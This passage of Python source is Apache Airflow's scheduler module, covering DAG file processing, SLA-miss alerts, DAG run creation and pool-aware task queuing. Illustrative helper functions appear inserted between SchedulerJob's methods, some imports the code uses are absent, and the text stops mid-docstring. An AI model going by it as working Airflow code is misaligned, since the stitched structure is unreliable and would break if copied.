import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULEABLE_STATES, SCHEDULED_DEPS
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
        # The process that was launched to process the given file.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
        # This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:return: the process that was launched
:rtype: multiprocessing.Process
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
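# Usage sketch for DagFileProcessor (hedged: the DAG file path is an assumption,
# and in Airflow this class is normally driven by the DagFileProcessorAgent
# rather than instantiated by hand):
#   processor = DagFileProcessor('/path/to/dag.py', pickle_dags=False,
#                                dag_id_white_list=[], zombies=[])
#   processor.start()
#   while not processor.done:
#       time.sleep(0.1)
#   simple_dags = processor.result   # result of SchedulerJob.process_file()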
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
        Find all tasks that have SLAs defined, and send alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag._schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n</code></pre>
Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
emails = set()
for task in dag.tasks:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is to move start_date up to one schedule period before now,
# so that timezone.utcnow() is after the period end and a run can be
# created immediately.
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
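# The catchup=False branch above effectively pulls start_date forward so that
# only the most recently completed schedule period is eligible. A standalone
# sketch of that adjustment, assuming a plain datetime.timedelta schedule
# interval instead of Airflow's cron-aware following_schedule /
# previous_schedule helpers (illustrative only, not the scheduler's code path).
def _effective_start_date_sketch(now, start_date, interval):
    if now <= start_date:
        return start_date
    # number of whole intervals elapsed since start_date
    elapsed = int((now - start_date) / interval)
    latest_boundary = start_date + elapsed * interval   # most recent boundary <= now
    one_period_before = latest_boundary - interval      # boundary before that
    # never move the start date backwards
    return max(one_period_before, start_date)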
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can happen if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in these states
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_state will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances in the given states, and
a map from (dag_id, task_id) to # of task instances in the given states
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
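# Concrete illustration of the aggregation above: given grouped rows of
# (task_id, dag_id, count) as returned by the query, the per-DAG totals and
# the per-(dag_id, task_id) counts come out as shown in the trailing comments
# (hypothetical dag/task names, illustrative only).
def _concurrency_maps_example():
    from collections import defaultdict
    rows = [('extract', 'etl', 2), ('load', 'etl', 1), ('train', 'ml', 3)]
    dag_map, task_map = defaultdict(int), defaultdict(int)
    for task_id, dag_id, count in rows:
        dag_map[dag_id] += count
        task_map[(dag_id, task_id)] = count
    # dict(dag_map)  -> {'etl': 3, 'ml': 3}
    # dict(task_map) -> {('etl', 'extract'): 2, ('etl', 'load'): 1, ('ml', 'train'): 3}
    return dict(dag_map), dict(task_map)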
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
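# Within each pool, candidates are ordered by descending priority_weight and,
# for equal priority, by ascending execution_date (the sort key used above).
# A tiny standalone illustration with hypothetical task instances:
def _priority_sort_example():
    from collections import namedtuple
    from datetime import datetime
    FakeTI = namedtuple('FakeTI', 'task_id priority_weight execution_date')
    tis = [
        FakeTI('a', 1, datetime(2019, 1, 2)),
        FakeTI('b', 5, datetime(2019, 1, 3)),
        FakeTI('c', 5, datetime(2019, 1, 1)),
    ]
    ordered = sorted(tis, key=lambda ti: (-ti.priority_weight, ti.execution_date))
    # [ti.task_id for ti in ordered] -> ['c', 'b', 'a']
    return ordered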
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
